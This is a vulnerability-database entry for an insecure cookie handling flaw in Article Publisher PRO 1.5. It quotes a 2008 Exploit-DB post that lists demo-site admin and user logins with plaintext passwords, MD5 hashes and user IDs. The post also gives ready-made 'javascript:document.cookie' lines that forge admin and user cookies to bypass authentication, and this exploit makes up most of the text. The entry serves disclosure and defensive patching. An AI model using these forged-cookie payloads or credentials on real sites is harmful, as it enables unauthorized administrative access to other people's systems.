Article Publisher PRO Insecure Cookie Handling Vulnerability

vendor:

Article Publisher PRO

by:

ZoRLu

7.5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Article Publisher PRO

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Article Publisher PRO Insecure Cookie Handling Vulnerability

Article Publisher PRO version 1.5 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting a malicious cookie with user_id and passwd_md5 values. This will allow the attacker to gain access to the application without authentication.

Mitigation:

Ensure that cookies are set with the secure flag and that the application is validating the user_id and passwd_md5 values.

Source

Exploit-DB raw data:

[~] Article Publisher PRO Insecure Cookie Handling Vulnerability
[~]
[~] version: 1.5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------

demo admin login:

http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php

demo user login:

http://demo-article-publisher-pro.phparticlescript.com/login.php


admin_name: admin

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 1

or

user_name: zorlu

passwd: zorlu

passwd_md5: 2178fb3ee4a88f946ecb68734b266c10

user_id: 6

or

user_name: demo

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 2


exploit:

admin:

javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";

user: 

javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";

for demo admin: ( user_id: 1)

javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

for demo user: ( for user zorlu user_id: 6 )

javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";

for demo user: ( for user demo user_id: 2 )

javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-01]